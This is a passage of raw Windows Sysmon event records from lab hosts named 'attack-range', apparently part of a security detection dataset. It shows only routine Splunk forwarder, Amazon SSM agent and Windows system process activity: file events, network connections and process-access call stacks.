Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCDEDBEF2846D3B4352E520828D03D07,SHA256=344F6EA9520B7B19AE2CDB2ACFD72006F2AFEECF906FFE01698EA0778AE101FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:55.446{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC6BC0EBEF6819CE377FBF719B89F42,SHA256=8583B9142B2F171EE1A3925A6C41CC23A6B9617E3BC5AE9C3BE2AED51F760769,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:55.563{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4B22B1E5532EE71F41D6D5A4D4F6C1D,SHA256=C3A8B94C0A6CA1B62B342BCF848EC33B3DF8E2A833CC83F07034232E0ADD3A79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:56.446{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0785C30B84A06682C6CAEFEED8E471D2,SHA256=E307ABE935E7DD09231205B46515DF0897CA6B808EAA565871A873705E2736DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:54.569{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53286-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:56.578{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64DC57F58D8DA16578A1805D3448A5F3,SHA256=FEA01A3CA3AFEE974F25149904FE21FB12EC479B672D06FFD181B8E1C4A0EFB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:57.664{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52CD0E0284076679FF5C60F5F677A2B4,SHA256=D28FFC51E59AFE0EA54D900493069425C4BA82CC889384343201077CB16716B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:57.594{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=736812D06709E51622868BC42878F34D,SHA256=67652C4685D01077ECA83D37C8247CE18912A1E44D805761EC35679170635743,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:58.821{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5D6B5CAE36239451664553B0E1FF50F,SHA256=A756F1F4BDC4B419326FD9DFAF18D3D5DD402D92F327CA3E10E7DAC19AAFA5C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:58.688{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64E9252967C5478CFC30BBB2515566FC,SHA256=B7FC50145FD4C493E16C8652CA92E8E0FFF3484F826F486B01D2E93BE0DB4191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:59.899{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB8D8C867AEAEEF17F0DA6B2AD5A2A52,SHA256=DDECAC3CF0018AB19BFAB178426EAEEEE0939EE258AAE2798CB2F122625378D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:59.719{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DD44713263ADDB032D5CB524047DAE2,SHA256=75631082DA8234019F2CF5648FAA27EC25735692E1757A0021A5FF57FD50641F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:00.734{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6A727212B3F3ADB411ACA9C4972048F,SHA256=B4AE351BCA0B3C930F93FE7F3E3CA507AD20D36D6A1D9BC01156FA0410F97B34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:57.650{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51224-false10.0.1.12-8000- 23542300x8000000000000000285915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:01.829{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D017B40B3DABB5519EDCE8DDBBA1DD06,SHA256=A0D2C88CDD0E5A3D23C7F248767C8459730A300097FB716BB536AA16E9676FDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:01.008{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20F3846CDC8B6D1851237144D3DF9591,SHA256=0946455D57C44A6B3C7E7653DD646341B333684D1A42A411E376CB377A8A8EA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:01.708{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-124MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.969{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F3E-6216-C604-000000003802}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.969{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.969{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.969{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.969{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.969{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0F3E-6216-C604-000000003802}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.969{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F3E-6216-C604-000000003802}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.782{C8EA50B7-0F3E-6216-C604-000000003802}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.922{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CBE4520BE5F2D88F70607BBD5CC2DC6,SHA256=363E0370CE1BB74A61FBED727A3269EF10F791521EB75ED5CAC3D29F1C3F5090,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.922{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D1A7E595B563C5B8CF5A58902175106,SHA256=0851804D06BE44980011E4FE0848428797F52AE857986850A7B7F6B4E32FB942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.875{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49934ED88F6AC533F1B700BE5D15DCDA,SHA256=68B9A566C5316D5CA3EC010FFDC06A05AEF841EEFCD4FC6615A92BE4526CC9F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:02.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7E1B43CCC1466663560534645079503,SHA256=9545268A9B9190A727C35C97A81954DFDF879197F94180E6C71C58028A704353,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.721{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-125MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.298{C8EA50B7-0F3D-6216-C504-000000003802}57404472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.048{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.048{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F3D-6216-C504-000000003802}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.048{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.048{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.048{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.048{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0F3D-6216-C504-000000003802}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:02.048{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F3D-6216-C504-000000003802}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 